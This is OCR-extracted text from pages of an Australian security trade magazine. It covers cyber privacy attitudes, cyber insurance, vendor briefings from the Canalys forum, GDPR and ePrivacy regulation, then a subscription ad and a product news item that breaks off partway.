"In Australia, the OAIC who report a total number of 13.3 million internet-connected Australians by the end of June 2016, last published a privacy survey in 2013" 2. PII thirsty technologies The technologies we enjoy in our daily lives for both personal and professional purposes, purposes which are often jointly served on devices (i.e. BYOD), are consuming by design an increasing volume of personal information for the sake of functionality and security. The personal information they consume is often exported out of the devices to the Cloud, creating a privacy risk that I believe to be often overlooked. There are many such examples of personalised content available with geolocation data (e.g. local weather update) and identity and web access history tracking for tailored content, such as advertisements. 3. Online service providers are regularly hacked The data we entrust to online service providers is also susceptible of being accidentally or maliciously leaked resulting on privacy breaches impacting individuals, and in some occasion to severe consequences such as resignation, divorce and even suicide (e.g. Ashley Madison case). 4. Government surveillance The Snowden revelations in 2013 have revealed to the world a mass Government digital surveillance program of impressive scale, which was supposedly designed for the good intent of protecting state and citizens through the sourcing of intelligence principally applied to counter-terrorism activities. The issue with the program was the sourcing and the processing of a huge amount of citizens' private and confidential information, without citizens' consent, which raises a great concern of potential privacy abuses. How much do we care about Cyber Privacy? We are all concerned about cyber privacy, but we increasingly compromise on it for convenience and opportunity purposes. Our understanding and control of the trade-off is questionable. In Australia, the OAIC who report a total number of 13.3 million internet-connected Australians by the end of June 2016, last published a privacy survey in 2013, the "2013 Community Attitudes to Privacy", which already reported at the time that: • 1 in 3 had issues with how their personal information had been handled in the previous year. • 3 in 4 were more concerned about sharing personal information online than in the previous survey. • More than 60% of individuals would censor using organisations or mobile apps over concerns of personal information handling.
In North America, the Pew’ survey on American Attitudes about Privacy, Security and Surveillance reported in 2015 a strong concern about the privacy issue for individuals based on a study conducted on an American population sample. Most Americans hold strong views about the importance of privacy in their everyday lives. They believe it is important, and often “very important”, that they be able to maintain privacy and confidentiality in commonplace activities of their lives, both online and offline. For instance, • 93% of adults say that being in control of who can get information about them is important (incl. 74% "very important") • 90% say that controlling what information is collected about them is important (incl. 65% "very important") • 88% say it is important that they not have someone watch or listen to them without their permission (incl. 67% "very important") In Europe, the European Commission also released a report in 2015, the Data Protection Eurobarometer, which reported similar findings. For example: • More than eight out of ten respondents feel that they do not have complete control over their personal data. • Two-thirds of respondents are concerned about not having complete control over the information they provide online. • 55% say they are concerned about the recording of their behaviour via payment cards. • 55% say they are concerned about the recording of everyday activities via mobile phone use or mobile applications. We are certainly claiming to be concerned about our cyber privacy, but to what extent do we really care about it? How well do we manage the Trade-off? We routinely trade-off privacy for convenience, more personalised services and opportunities to an extent where we may not understand, and be able to best manage, the privacy risks we expose ourselves to. For a start, we understand that providing personal information online is an increasing part of modern life (71% from the 2015 Data Protection Eurobarometer), and that there is no alternative other than to provide personal information if you want to obtain products or services (58% from the 2015 Data Protection Eurobarometer). For example, many professional and social opportunities are reliant on online services such as LinkedIn and Facebook. Not compromising enough with the publishing of private information could prove to be a limiting and disadvantaging factor. We trade-off privacy for more personalised online services. Telstra's research on Millennials, Mobiles and Money reports that young adults or "Millennials" (18 to 34 years old in 2014/2015) "demand speed, convenience, flexibility and customisation" from banking online services and mobile apps, where "the optimum trade-off between privacy and personalisation is changing daily". We trade-off privacy for convenience, such as for the privilege of using personal mobile devices to access
Australian Security Magazine | 37
"According to the 2015 Pew' survey, few individuals would appear to do anything tangible to protect their Cyber Privacy. For instance, very few individuals would have adopted effective privacy protection measures such as encryption of their
Are we doing much with the options we have? According to the 2015 Pew' survey, few individuals would appear to do anything tangible to protect their Cyber Privacy. For instance, very few individuals would have adopted effective privacy protection measures such as encryption of their communications, hereby accepting - if not ignoring - the risk of compromise of their private communications and data.
How achievable is it to attain enough Cyber Privacy?
corporate data. Such a privilege is increasingly subject to the deployment and operation of enterprise security agents on personal devices. For instance, I recently had 2 enterprise mobile security agents deployed on my personal mobile phone as an enforced security requirement to my enjoyment of work email and calendar access from my device. My knowledge of what those agents were doing on my device, what personal data they might be capturing and what they were doing with it was rather limited. We can also appreciate a level of trade-off for state and citizens' security purposes. However, the extent to which we can and do really appreciate the privacy risks we are trading-off with is really questionable.
The Pew survey partly answers why we may not do much about better managing our privacy risks. The report refers to the following quote from some information scholars, which may well summarise the high *cost* of attaining privacy: “privacy is not something one can simply ‘have,’ but rather is something people seek to ‘achieve’ through an ongoing process of negotiation of all the ways that information flows across different contexts in daily life”. The referred ongoing process of negotiation may imply a high effort of discipline to achieve better privacy and it may simply be too hard to do to achieve great cyber privacy. We are clearly concerned about our online privacy, but we don't do much about it. We trade-off privacy for the sake of convenience, opportunity and security without measuring the implications of it. Technology options exist to better manage some privacy risks, but we also don't use them much (too hard) and they are themselves the subject of risks. The focus and the development of cyber safety education programs may however provide the best opportunity for improvement longer term, especially as they start with young children. Such programs may provide the key to achieving, in time, enough Cyber Privacy.
What do we do about our Cyber Privacy? There are options to improve the security of personal data and communications. For a start, personal data management practices can be improved through education and the application of further caution online about privacy. For example, in Australia, we can highlight the program ThinkUKnow, which is oriented toward children cyber safety, as one of the great initiatives sponsored by the Government and industry partners. Such programs are growing and I hope will change behaviours over time. Technology is also available to reduce some privacy risks, such as for example (amongst many): • VPNs for private web-browsing (a myriad of service providers, but which to trust?), • Anonymous web browsers, such as the TOR browser, • Encryption toolkits such as PGP to protect communications such as emails, • Applications to secure mobile communications, such as Wickr and WhatsApp (both of which have been reported to be used by leading Australian political figures), Signal, and ChatSecure just to name a few, • Applications positioning a more identity centric view of privacy, such as SudoApp. While some of those options appear to be growing in popularity, they are not of widespread use. They are also the subject of a relative privacy protection due to technology vulnerabilities and also the increasing pressure from some
38 | Australian Security Magazine
law and intelligence agencies to tap into those technologies, sometimes through backdoors that would also present a risk of exploitation by malicious parties.
About the Author Gui is a Cyber Security Advisor who delivers businessfocused Cyber Security and Technology services. He is passionate about the issues of Security & Privacy, and the process to address them in both business and personal contexts. As the General Manager for Pirean in Australia & New-Zealand, Gui leads Pirean’s business development in the region with Identity and Access Management technology and services.
Information Security and the role of cyber insurance
O By Tony Campbell Editor, Australian Cyber Security Magazine
ne of the latest trends in the information security marketplace is cyber insurance. Numerous companies are now offering policies and cover for a variety of different kinds of cyber incident, especially about managing the fallout from data breaches and any legal costs or fines they may need to pay once the breach goes public. But the reality of what cyber insurance can do for us is somewhat limited by what the insurance company knows about the risk, which is why it’s only possible to get cover for tangible costs rather than intangibles. What’s Important to your Business? Customer data and credit card data breaches are in the headlines every week, so the layman should be forgiven if they forgot that cybercrime was so much more multifaceted. In the middle of December, German steel conglomerate, ThyssenKrupp AG, provided a stark reminder that so much more is at stake than PII and CVVs and the clean-up after a cyber incident. ThyssenKrupp, worth around $14 billion (USD), disclosed that they had, ‘become the target of a massive cyber attack,” in April 2016. When their internal computer emergency response team (CERT) discovered intruders on their network, evidence suggested the unknown threat actors had been pilfering intellectual property (IP) from their systems for at least two months. ThyssenKrupp’s announcement suggested the attackers originated from somewhere in southeast Asia and that the stolen IP belonged to several of its global businesses. Identifying and Managing Cyber Risk. It pays to remember that cybersecurity teams must have the people, processes and technology to tackle cybercrime from all aspects of the risk profile. Each of the top-level risk categories need to be assessed, considered and managed to make sure that you’ve tried to protect what’s most important to your organisation. Risks fall into several of these top-level categories, such as the loss of trade secrets (IP), financial loss, loss of reputation or credibility and the loss of life. Clearly, we’ll see individual risks on each of these categories, depending on the means of the attackers, coupled with their motivation and intent. When you develop your risk treatment plan, you’ll pick the best options to mitigate those risks, hopefully reducing them to an acceptable level where the board is happy that enough has been done. Options in your risk treatment
plan are typically categorised as follows: accept the risk; reduce it using countermeasures that affect its likelihood or consequence; avoid it altogether; or transfer it to a third party, such as a partner or cyber insurance company. To reduce risk, you’ll consider technical controls, such as firewalls, IPSs, endpoint security systems and protective monitoring, so that your security operations centre can investigate suspicious behaviour. Furthermore, when looking at other risk related to the threat of malicious insiders, you might introduce procedural countermeasures, such as two-person rule for accessing sensitive systems or facilities and mandatory leave for sensitive roles, such as highly privileged systems administration staff. Where Does Cyber Insurance Fit into the Puzzle? Is cyber insurance a legitimate option for transferring risk that we should be recommending to our executives? If it’s used wisely and not purchased to avoid doing the complex tasks related to managing an information security programme, then it certainly has a part to play. In context, the global cyber insurance market is forecast to reach $14 billion (USD) by 2022, according to Allied Market Research, so, it’s clearly getting legs on the international stage. Pay-outs from cyber insurance companies will help pay for clean-up costs after a breach, which can cover the costs of investigations, legal costs and even help rebuild your reputation, maybe by paying for a PR company’s time or paying for privacy protection services for your customers. Nevertheless, in ThyssenKrupp’s case, the impact of loss of IP and trade secrets isn’t something that is easily quantified, so it’s very hard to insure against this kind of attack. Cyber insurance will help them offset the costs involved with the breach investigation and help them recoup network and system downtime costs, or those relating to interruption of normal business. However, cyber insurance is a nascent product that underwriters still haven’t quite figured out how to quantify. There isn’t a lot of historical data that can be used to profile threats and likely scenarios of attack, especially given most companies don’t report cybercrime and even those that do don’t tend to report the full impact of the breach. Even with all the right security controls in place, once you’re a target, all bets are off. ThyssenKrupp has highlighted that the scale of modern hacking is way off the charts and that no matter how big and well-funded your security team is, you’re fighting an unwinnable battle that, at some point in the not-too-distant future, you’ll be hacked. And potentially, the only thing standing between the end of your company and you surviving the attack is an insurance policy.
Australian Security Magazine | 39
| FEATURE REVIEW
// CANALYS CHANNELS FORUM – MACAU MySecurity Media attended the Canalys Channels Partner ‘Digital First’ Forum in Macau in late October for the always insightful annual briefing from CEO Steve Brazier on how the APAC region is fairing both politically, economically and technologically. As Brazier highlighted to a sold-out delegation of over 1,000 delegates, from over 530 channel partners, China is increasingly separating itself with far different dynamics than the rest of the Asia Pacific (APAC). The South China Sea is a key risk and “you can't emphasise how important the South China Sea is… issues of security are going up and up and up.” With this in mind, Asia has been late to discover the importance of security and as an example, in IT Security, according to Fireeye, the average time taken between a data breach and its detection in Asia is 520 days, whilst the world average is 146 days. With a host of mergers and acquisitions forming a convergent technology industry amidst ever increasing security challenges, two of the biggest, Hewlett Packard Enterprises and DellEMC had a busy 2016 – one was planning a new business structure having de-merged and the other planning around a major merger – here’s a snap shot into their story.
// THRIVING IN AN AGE OF DIGITAL DISRUPTION Briefing by Peter Ryan, Chief Sales Officer, Enterprise Group, Hewlett Packard Enterprise When you look around the world, every industry, every customer, every size, every government and taste of consumers in every part of the world is changing dramatically. Digital transformation is happening everywhere and you have a choice – either disrupt or be disrupted. It is not an option to just sit still. What you would have seen from HPE in the
40 | Australian Security Magazine
last 12 months is to be very decisive about the choices we’ve made, to be competitive and to be successful in helping our partners and customers as they go through these transformations. After the separation with HP Inc in our spin out and merging the Enterprise Services Business with CSC and the spin out of the software business with Britain’s Micro Focus International – what that leaves us with is a very focused strategy around secure hybrid IT, around the intelligence edge and around the transformation services that our customers need. We view ourselves as a critical player in the eco-system that will drive transformation going forward. HPE still have over 22,000 services people within the company, still a reasonably sized workforce. But our strategy has always, unashamedly, been to partner. We’re part of the open eco-system so we’re bringing our services to bear to help drive transformation but also encompass all the services from our partners, whatever size and shape of business that they are.
Hybrid IT will win! HPE has a few basic beliefs. We have a strong belief that hybrid IT will win. The way IT will be delivered will be a combination of public, private and traditional. Some people will run it themselves, some will get other people to manage it for them. Our aim there is to make hybrid IT simple.
The second belief is that there will be explosive growth at the edge. The edge for us will mean mobility and industrial IoT. We will see a lot of applications emerge there. We will power the intelligence edge. And the third platform for the strategy is that we have the ability and competence to execute the transformation required. That comes back to our service capability and the partnership eco-system. If you look at HPE going forward it is a $28 billion company. In terms of relevance, we’re a strong global player. If we look to Asia, 80 per cent of our business goes through our channel partners. We’re number 1 or number 2 in every category that we operate in across the piece. The core software assets that we have kept are around hybrid, around the edge, around Aruba, around our server compute, hyper converge and this creates incredible opportunity for our channel partners. The addressable market we have between us is more than US$250 billion and we’re a US$28 billion company. So the question of relevance and opportunity is do we have room to grow? The answer is surely we all do. From a business perspective, there is fantastic opportunity and everyone should be energised by it. The guidance we have given securities analysts is that we will have GDP like growth and within that there is some pressure on traditional aspects of the business and then there is massively growing aspects of the business. On a worldwide basis, our Flash business grew last quarter 44% and we’re the only one of the top venders to have grown Flash year on year over
CANALYS | FEATURE REVIEW the last 10 consecutive quarters. Here in Asia we’re growing 3-4 times the market. For hybrid performance computing we’re still the leaders in this area, which is an US$11 billion addressable market and growing 7-8% and have cemented our position with the acquisition of SGI (Silicon Graphics International) and we’ve had pockets of great growth, such as in hyper-converged and cloud computing. All of these pockets of growth give us a chance, together with our channel partners, to continue to execute real revenue, grow profits, improve cash flow but also make revenues more sticky. One of the things we’re seeing with growth is as consumption models change around hybrid IT, people want to pay as they go, everything as a service, as a utility. So, we’re finding our HPE financial services business is giving our channel partners a great new stream of income and margin. But also, critically, the ability to manage the install base in a better way. In our acquisitions, we’ve clearly said we will be looking at organic and in-organic roots. Our acquisition of Aruba, in many ways, has been a gift from the gods. It has been a fantastic driver of growth and the areas of business it is opening up for us has been phenomenal. The sales energy from the Aruba team has been fantastic and we also like the recent SGI and Docker acquisitions in similar ways. We are one of the few companies that can explore all options because we have that strong financial grounding to do it.
// EDITOR’S INTERVIEW With Steve Wood, Vice President Asia Pacific, Aruba, A Hewlett Packard Enterprise Company. Steve is the former President of Nortel in Australia, with a long history in the networking and telecommunications space and now head’s up Aruba in the APAC region. “I’ve been in the networking business for the best part of 30 years and have been with Aruba since the time of the acquisition by HP and then which became HPE. We’ve seen great opportunity off the back of being a 13 year start up, with the charter to bring secure mobility to life, which has been what has driven our business over the years". With the merger into HPE, it has been
great for us and allowed us to showcase our technology into many of the world’s largest accounts, which previously we were unable to access. Over the last year we’ve been operating as two entities and as of November 2016 we have been able to pull it all together, with a single operating model and a new partner ready program, which has picked the best of both worlds out of Aruba and the HP switching side and bringing a new channel, as part of the Enterprise Group, with the partners and distributors. It has been very exciting. Our Partner Ready for Network Program is the core of our ‘go to market’ business. This means a single price list in local dollars, partners have been trained in stock keeping units for switch and wireless devices and the businesses have been fully rationalised. So with what Aruba, now with HPE, can offer into the market, means we’re getting a lot of phone calls from people who want to check out what’s on offer. We’re very strong in defence, tertiary education, retail, such as Westfield malls and hospitality industries. Westfield use our Aruba mobility solutions and allows the landlords to track foot traffic, right down to the half metre and then use analytics to send messages to customers and potential customers as they use the strong Wi-Fi in the mall - these concepts are creating new business models. Another example would be the Levi Stadium which hosts the Super Bowl. Through an App, we can deliver food and beverage right to the seat. This also allows targeted merchandise offers, such as if they are sitting in the sun they get a cold beer offer. So it is creating lots of new ways you can interact with your customers and this is driving the growth and in some cases it is the marketing department that is buying the network. In hospitality, we have recently won the contact for the MGM Casino in Macau, and now four of the six largest casinos are standardised on Aruba. We have found the Aruba brand a real differentiator for setting apart the business networking unit, which I’m in charge of for the Asia Pacific. Having joined with HPE we have gone on to win the Home Depot in North America which is a US$120 million order, the single biggest order in the history of HP networking, formerly a premium Cisco account. We also won BestBuy, United Airlines, Department of Defence in Australia. Defence is probably our biggest single customer in the world on the Aruba side because of the Class B security that we can bring and encrypt in the air which is a feature defence find very attractive
and that has made us very strong across the defence industry around the world. With our Clear Pass product, it is our leading product because it securitises the perimeter of the network, and the network edge is now mobile. So the way in which you once provided security to your switch and branch office network by putting in firewalls and locking down each user at a desk, those rules don’t apply anymore. Our secure mobility product Clear Pass allows CIOs to get security around a perimeter they can no longer see and if they can see it, provides them the context. Aruba is also responsible for the IoT strategy of HPE and our compute platforms Edgeline and Moonshot are sitting right at the very edge of the network. The Moonshot cartridge sits inside the edge of the network and Edge Line is a compute engine that can pick up a lot of data, analyse it and shoot it back to the IoT device rather going all the way through to the branch and into the datacentre and then back out again. This reduces the latency, so you don’t have to wait for the instruction to turn the switch off, be it a controller such as for air-conditioning or lighting. As these formerly analogue systems are becoming connected IoT devices and sitting at the edge of networks, the way the instructions are being transported is over wireless and Wi-Fi networks, so we have a number of solutions in this space.
// HPE ARUBA EXECUTIVE PROFILE | STEVE WOOD Steve Wood is responsible for leading the networking business unit for Hewlett Packard Enterprise across the Asia Pacific region. Prior to this role, he served as a Chairman of Aruba
Australian Security Magazine | 41
| FEATURE REVIEW Networks Advisory Board in Australia. An accomplished Chief Executive in the technology, sports and media sectors, Steve has led the Asia Pacific operations of numerous high growth technology businesses. He was most recently Chief Executive Officer of Tennis Australia where he was responsible for the Australian Open Grand Slam and the National tennis industry. He has also served as President of Australia & New Zealand for Nortel Networks, Vice President of Asia Pacific for Alteon Websystems and has previously held leadership positions at Bay Networks, SynOptics Communications Inc. and MPA International. Steve currently serves as the Chairman of the Board for the University of Melbourne Networked Society Institute, Australia's premier research institute in broadband technologies. Steve holds a Bachelor of Business Administration from Louisiana State University.
// HEWLETT PACKARD ENTERPRISE REPORT REVEALS TRIALS AND ERRORS OF SECURITY OPERATIONS SOCs forgo security basics, leaving 82 percent of organisations below target maturity levels and vulnerable The fourth annual State of Security Operations Report 2017, provides an insight and analysis of the effectiveness of security operations centres (SOCs), and best practices for mitigating risk in an evolving cybersecurity landscape. With increased pressure to align security initiatives with business goals, an organisation’s SOC provides the foundation for how to protect the most sensitive assets, and detect and respond to threats. This report’s findings show that the majority of SOCs are falling below target maturity levels, leaving organisations vulnerable in the event of an attack. Nearly 140 SOCs in more than 180
42 | Australian Security Magazine
assessments around the globe were examined and measured on the HPE Security Operations Maturity Model (SOMM) scale that evaluates the people, processes, technology and business capabilities. A SOC that is welldefined, subjectively evaluated and flexible is recommended for any modern enterprise; however, 82 percent of SOCs were found to be failing to meet this criteria and falling below the optimal maturity level. 1
Key Observations •
SOC maturity decreases with hunt-only programs. The implementation of hunt teams to search for unknown threats has become a major trend in the security industry. While organisations that added hunt teams to their existing real-time monitoring capabilities increased their maturity levels, programs that focused solely on hunt teams had an adverse effect.1 Complete automation is an unrealistic goal. A shortage of security talent remains
the number one concern for security operations, making automation a critical component for any successful SOC. However, advanced threats still require human investigation and risk assessments need human reasoning, making it imperative that organisations strike a balance between automation and staffing.1 Focus and goals are more important than size of organisation. There is no link between the size of a business and maturity of its cyber defense centre. Instead, organisations that use security as a competitive differentiator, for market leadership, or to create alignment with their industry are better predictors of mature SOCs.1 Hybrid solutions and staffing models provide increased capabilities. Organisations that keep risk management in-house, and scale with external resources, such as leveraging managed security services providers (MSSPs) for co-staffing or in-sourcing, can boost their maturity and address the skills gap.1
CANALYS | FEATURE REVIEW
// DELLEMC MERGER: GLOBAL CHANNEL PARTNER PROGRAM LAUNCHES FEBRUARY 1ST Having merged early in September, DellEMC’s John Byrne, President Global Channel was in Macau seven week’s later briefing APAC Channel Partners on the newly formed company’s revised channel leadership team and channel partner programme. At the time of the merger, EMC had 800 channel partners and Dell had 3,000, with the combined channel market sitting at US$35 billion and growing 3-4 times faster than the rest of the market. Global numbers had 53% of the business selling through channel partners but across APJ (Asia Pacific & Japan) the rate
was much higher, sitting at 69%. India and China being in the top three countries in terms of sales and the region growing 6 times the rest of the market. Throughout the merger process there were partner advisory boards, partner councils and a global partner webcast with 2,000 partners to discuss how a new growth engine would work. John Byrne highlighted “we want to grow from the top lines as well as to the bottom lines”. Even at US$35 billion, DellEMC considers itself a ‘dark horse’ because they still see so much upside. Within the new Dell EMC structure is the PC Organisation, or the Client organisation, the Infrastructure Solutions Group (ISG), and Services. Within these areas there are three sales segments, Enterprise, Commercial and Consumer Small Business (CSB). The global channel sales organisation has been centralised and launches the DellEMC Partner Program as a new Channel Program. The program will be based on three key elements, simplicity, predicable and profitability. Channel partners will be allocated based on Tiers, Tracks and were awaiting the final criteria,
announced in December which will define where the partners sit. The new program will be effective as of February 1, 2017. The DELL and EMC channel programs have been working separately until the February launch but both DELL and EMC had made significant progress in selling through the channel and John Byrne acknowledges the channel community is changing significantly, “they do not want to be treated like resellers.” Channel tiers include Gold, Platinum, Titanium, and despite only three tiers – there remains a special extra tier - Titanium Black. The tracks represent channel profiles being SP (Solution Providers), OEM (Original Equipment Manufacturers), CSPs (Cloud Solution Providers) , MSPs (Managed Service Providers), RSA, remaining the security division, and VirtueStream. Pivotal, Secureworks and VMware are all remaining separate as part of Dell Technologies. John Byrne asserted confidently, “the advantage is that we can now offer the end to end solutions, from the PC to the cloud, services and the widest portfolio on products. DellEMC spent $4.5 billion on research and development and that is double that of the competition – and we remain dominant in 20 of Gartner’s magic quadrants. We’re number one on several fronts. DellEMC is the fastest growing PC company and number one in servers, number one in workstations and fastest growing in storage. We want to be number one of everything.” IoT is naturally seen as a big market. An example of a DellEMC smart city partner project involves a 100,000 vehicles equipped with GPS devices, tracking the movement of the cars and using DELL solutions to analyse the car movements to design traffic management policies. Another in a Thailand province is working with the aging population and seniors are tracked with wearable devices and these are connected to hospitals, with data being analysed for health benefits and early medical response. Also in late October, LogRythym announced that it had formed a worldwide resale partnership with Dell EMC, with LogRhythm being one of Dell EMC’s largest OEM customers. LogRhythm uses Dell servers and storage to build security appliances for rapid threat detection and response solutions, which Gartner expects to reach US$23 billion by 2020. LogRhythm’s Security Intelligence and Analytics Platform unifies next-generation SIEM, log management, network monitoring, endpoint monitoring, and advanced security
Australian Security Magazine | 43
| FEATURE REVIEW analytics. It also helps organisations meet compliance requirements and respond to IT operations and events. “Demand for solutions that can detect and neutralise cyber adversaries before they can cause a material breach has never been greater,” said Mike Reagan, chief marketing officer at LogRhythm. “This partnership with Dell EMC bolsters our ability to capitalise on this burgeoning market by bringing our awardwinning security intelligence and analytics solutions to more enterprises around the world.”
// PRIVACY AND NATIONAL SECURITY Briefing by Rachel Lachford, Vice President Marketing, Canalys European Union General Data Protection Regulations (GDPR) will be entering into application on the 25 May 2018 after a two year transition period. The wider implications of the GDPR are focused on data privacy controls without country or regional boundaries. This is reflecting the nature of the data flows and that’s being enable to the new technologies and the creative and disruptive business models emerging in new digital economies. Over half the countries in the world now have some form of data protection or privacy laws and many of those are strongly influenced by the EU approach. What we are now starting to see is a trend towards global ubiquity of data privacy emerging. The EU GDPR is probably the most ambitious endeavour so far in terms of securing the rights of the individual in the digital realm. This is probably the case for this generation as they were last created in 1995 and so finally we have this huge refresh that adopts technological advancements over the last twenty years. The requirement to confirm to the GDPR will prevail, not only within the EU but across a majority of countries and will have significant impact on a global level. This will start to create a new standard for all data processes and transfers across the global. This will most initially impact those companies that are operating internationally but will also see a ripple down affect into country level business operations. 2017 will see more conversations within the business communities, of all sizes, around data
44 | Australian Security Magazine
privacy regulations and will be a critical year in Europe for implementation with compliance required by 2018. This is not just a ‘large’ company issue, even for the SMB market, they will need to be thinking about how they are going to comply and combat the myriad of threats and emerging threats across the global supply chain. SMBs take up a majority of supply chains and though they may tend to operate on a small local scale if they are linked to a global supply chain then they will be impacted. Data transfers know no boundaries. As we move to 2020 the numbers suggest the proliferation of IoT devices and there will be an overwhelming bulk of industrial devices that are transferring digital information and will fall into the realm of privacy and data transfer regulations. Japan, as an example, is looking to reform and implement their own regulations and will be a certified country approved to deal with EU countries. This will be a global issue around privacy and data encryption. Cloud is also a major factor in the reason this becomes relevant
In the last 18 months Hong Kong has seen three convictions under its direct marketing legislation with fines of HK$10,000 and HK$30,000 issued. to everybody. If you are hosting applications, finance, CRM or any business process, where is the data being hosted from and transferred too. Cloud providers are bringing in new requirements into their contracts, such as wording similar to, “it is your responsibility to encrypt the data that is being sent to your customers’. The primary responsibilities will be to encrypt data when sending to customers and notify of any breaches within 72 hours. Sanctions will be a big incentiviser for
CANALYS | FEATURE REVIEW businesses to protect themselves. We’re seeing implementation of large fines in EU, US and South Korea has introduced punitive damages to some stringent privacy laws. In the last 18 months Hong Kong has seen three convictions under its direct marketing legislation with fines of HK$10,000 and HK$30,000 issued. This is more about ‘big data’ but more focused on ‘big personal data’ and working out what is personal and what is not and developing a trust system of data protection with accountability, privacy by design, clarity and understanding what sanctions will be applied. Companies are encouraged to get back to basics, have data discovery processes, data privacy and risk assessment processes, provide staff training, develop user awareness and training, and historically, user awareness is a key to success.
// COMMISSION PROPOSES HIGH LEVEL OF PRIVACY RULES FOR ALL ELECTRONIC COMMUNICATIONS AND UPDATES DATA PROTECTION RULES FOR EU The Proposal for a Regulation on Privacy and Electronic Communications aim to update current rules, extending their scope to all electronic communication providers. They also aim to create new possibilities to process communication data and reinforce trust and security in the Digital Single Market – a key objective of the Digital Single Market strategy. At the same time, the proposal aligns the rules for electronic communications with the new world-class standards of the EU's General Data Protection Regulation. First Vice-President Timmermans said: "Our proposals will complete the EU data protection framework. They will ensure that the privacy of electronic communications is protected by up to date and effective rules, and that European institutions will apply the same high standards that we expect from our Member States." Věra
Jourová, Commissioner for Justice, Consumers and Gender Equality said: "We are also setting out our strategy to facilitate international data exchanges in the global digital economy and promote high data protection standards worldwide." • Better online protection and new business opportunities The proposed Regulation on Privacy and Electronic Communications will increase the protection of people's private life and open up new opportunities for business: • New players: 92% of Europeans say it is important that their emails and online messages remain confidential. However, the current ePrivacy Directive only applies to traditional telecoms operators. Privacy rules will now also cover new providers of electronic communications services, such as WhatsApp, Facebook Messenger, Skype, Gmail, iMessage, or Viber. • Stronger rules: By updating the current Directive with a directly applicable Regulation, all people and businesses in the EU will enjoy the same level of protection for their electronic communications. Businesses will also benefit from one single set of rules across the EU. • Communications content and metadata: Privacy will be guaranteed for both content and metadata derived from electronic communications (e.g. time of a call and location). Both have a high privacy component and, under the proposed rules, will need to be anonymised or deleted if users have not given their consent, unless the data is required for instance for billing purposes. • New business opportunities: Once consent is given for communications data, both content and/or metadata, to be processed, traditional telecoms operators will have more opportunities to use data and provide additional services. For example, they could produce heat maps indicating the presence of individuals to help public authorities and transport companies when developing new infrastructure projects. • Simpler rules on cookies: The so called "cookie provision", which has resulted in an overload of consent requests for internet users, will be streamlined. New rules will allow users to be more in control of their settings, providing an easy way to accept or refuse the tracking of cookies and other identifiers in case of privacy risks. The proposal clarifies that no consent is needed
for non-privacy intrusive cookies improving internet experience (e.g. to remember shopping cart history). Cookies set by a visited website counting the number of visitors to that website will no longer require consent. Protection against spam: Today's proposal bans unsolicited electronic communication by any means, e.g. by emails, SMS and in principle also by phone calls if users have not given their consent. Member States may opt for a solution that gives consumers the right to object to the reception of voiceto-voice marketing calls, for example by registering their number on a do-not-call list. Marketing callers will need to display their phone number or use a special pre-fix that indicates a marketing call. More effective enforcement: The enforcement of the confidentiality rules in the Regulation will be the responsibility of national data protection authorities.
International data protection A strategic approach is being taken to the issue of international personal data transfers, with the aim to facilitate commercial exchanges and promote better law enforcement cooperation, while ensuring a high level of data protection. The Commission plans to engage in discussions on reaching "adequacy decisions" (allowing for the free flow of personal data to countries with "essentially equivalent" data protection rules to those in the EU) with key trading partners in East and South-East Asia, starting with Japan and Korea in 2017. In addition, the Commission will also make full use of other alternative mechanisms provided by the new EU data protection rules to facilitate the exchange of personal data with other third countries with which adequacy decisions cannot be reached. Next steps With the presentation of the proposals in early January 2017, the Commission is calling on the European Parliament and the Council to work swiftly and to ensure their smooth adoption by 25 May 2018, when the General Data Protection Regulation will enter into application. The intention is to provide citizens and businesses with a fully-fledged and complete legal framework for privacy and data protection in Europe by this date.
Australian Security Magazine | 45
See our website for details ma
nal natio ar, in Inter ASIS nual Sem, USA An aheim An
te A Sta ISAC , Perth e rinngferenc e e in o l eng attCacks Socia
s utive ch E u AZIN exec MAG ITY Why to be m CUR d E SE e e n hier ORAT ORP C c ND mu NT A THE
rity in Secu ment, rn Gove anberra C
of cult The ware the a
FEAT RISIS t LS C men SKIL le an e hum ation e h T form in in ction prote
S P UP w.a WRA ww al ENT ation e, L EV N IA A C AIS nferenc e SPE Co ourn Melb ra ust
ess a busin -high y strakliing ill Au Ta curity sk w How up? se keep
ption dece s of Sign $8.95
ren n child s satio cting bullie adicali art III R s – P ria Prote cyber y s m S e fro Proc is over lys para The Time Tech
1 YEAR SUBSCRIPTION
city Safe The need for ity Its and roperabil inte
reat ted a er Th Insid be elimintive c n a a o C a pr with oach appr
TO THE AUSTRALIAN SECURITY MAGAZINE
Get each print issue per year for only $88.00
A, k Q& , Quicrity and . Time u Tech ber Sec h more.. Cy muc
SUBSCRIBE TODAY... DON’T MISS AN ISSUE Yes! I wish to subscribe to the Australian Security Magazine, (1 year). ☐
Yes! As an additional bonus I wish to receive direct to my inbox the Asia Pacific Security Magazine (emag)
No business or government organisation survives in a vacuum. Sharing knowledge is fundamental to the development of successful security planning and implementation. That is the role of our magazine: sharing knowledge of developments in security management for public and private sector organisations, both for internal management and for external obligations in public safety and security.
www.australiansecuritymagazine.com.au/subscribe and fill in our subscription form online. Dont miss an issue! Phone: +61 (8) 6465 4732 during business hours AWST (Australia Only)
46 | Australian Security Magazine
PRIORITY FAX Credit Card Details Australia +61 (8) 9467 9155
FREE POST My Security Media 286 Alexander Drive, Dianella. W.A. 6059
GST This document will become a TAX INVOICE for GST when payment is made. My Security Media Pty Ltd ABN 54 145 849 056
Within TechTime you will find the very latest information, news and products from a wide variety of security industries, ranging from cameras, computers, software and hardware.
Spotter RF: A2000
To have your company news or latest products featured in our TechTime section, please email firstname.lastname@example.org
Latest News and Products Australian Security Magazine | 47
TechTime - latest news and products
Multitone launches 'EkoSecure' for campus worker protection Multitone Electronics has announced the launch of its EkoSecure solution, for the campus or site wide protection of workers. EkoSecure builds upon the company’s EkoTek staff protection system, featuring a wider coverage area which is ideal for outdoor and remote locations around any workplace facility. Husam Al-karnaz, Solutions Architect at Multitone, commented “EkoSecure is a development of our highly successful EkoTek solution. It widens the coverage area using a mesh network of repeater units, which can be up to 60 metres apart, that extends the protection quickly and efficiently, reducing installation and operational costs.” Using the mesh network system also adds significant redundancy mitigation to the solution, as Husam continued, “Using this approach, if there is any failure in the network it can be instantly compensated for, the alarm raised and assistance called for, when a worker is in trouble. Additionally, the handheld EkoSecure device uses a loud audio alarm to direct a response team directly to the incident, which is vital in large areas where pinpointing a precise location can be a challenge.”
User pager EkoSecure pagers offer four types of alarm, ensuring users are fully protected and that the assistance team is informed what type of emergency it is. These consist of: •
• • •
